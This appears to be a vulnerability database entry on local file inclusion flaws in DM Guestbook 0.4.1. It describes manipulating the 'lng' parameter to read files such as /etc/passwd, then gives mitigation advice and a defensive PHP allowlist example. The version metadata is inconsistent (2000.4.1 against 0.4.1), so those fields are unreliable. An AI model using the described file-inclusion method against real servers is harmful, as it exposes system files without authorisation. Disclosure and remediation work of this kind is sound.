vendor: DM Guestbook
by: milw0rm.com
CVSS: 6.4 MEDIUM
Local File Include
CWE: 22
Product Name: DM Guestbook
Affected Version From: 2000.4.1
Affected Version To: 2000.4.1
Patch Exists: NO
Related CWE:
CPE:
Platforms Tested:
2007
DM Guestbook <= 0.4.1 Multiple Local File Include Vulnerabilities
DM Guestbook version 0.4.1 is vulnerable to multiple local file inclusion vulnerabilities. By manipulating the 'lng' parameter in various PHP scripts, an attacker can include arbitrary files from the system, such as /etc/passwd. This allows an attacker to view sensitive information and potentially gain unauthorized access to the system.
Mitigation:
To mitigate these vulnerabilities, update to a patched version of DM Guestbook or apply the relevant security patches provided by the vendor. Additionally, restrict access to the affected scripts or implement proper input validation and sanitization to prevent arbitrary file inclusion attacks.
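
One way to implement the input validation recommended above, as an added example that is not DM Guestbook's own code: the 'lng' value is matched against a fixed allowlist and the resulting path is checked to sit inside the language directory before it is included. The directory layout, the `<code>.php` file naming, the language codes and the function name are assumptions.

```php
<?php
// Added example, not DM Guestbook code. LANG_DIR, the file naming scheme
// and the language codes below are assumptions made for illustration.

const LANG_DIR = __DIR__ . '/lang';         // hypothetical language directory
const ALLOWED_LANGS = ['en', 'de', 'fr'];   // hypothetical allowlist
const DEFAULT_LANG = 'en';

/**
 * Map a user-supplied 'lng' value to a language file path. The value is
 * only used to build a path after it has matched the allowlist exactly.
 */
function resolve_language_file($requested, string $langDir = LANG_DIR): string
{
    // Arrays (lng[]=x) and other non-string input are rejected outright.
    $code = is_string($requested) ? $requested : '';

    // Strict comparison: no type juggling and no partial matches, so values
    // containing '/', '..', NUL bytes or stream wrappers can never pass.
    if (!in_array($code, ALLOWED_LANGS, true)) {
        // Record the rejected value for detection; json_encode keeps
        // control characters out of the log line.
        error_log('lng rejected: ' . json_encode($requested));
        $code = DEFAULT_LANG;
    }

    // Defence in depth: canonicalise and confirm the file is still inside
    // the language directory (catches symlinks and misconfiguration).
    $base = realpath($langDir);
    $path = realpath($langDir . '/' . $code . '.php');
    if ($base === false || $path === false
        || strncmp($path, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        throw new RuntimeException('Language file unavailable');
    }
    return $path;
}

// Usage in a script that reads the parameter from the request:
// require resolve_language_file($_GET['lng'] ?? DEFAULT_LANG);
```

Rejected values written by `error_log` give a simple signal to alert on, since legitimate requests only ever send one of the allowlisted codes.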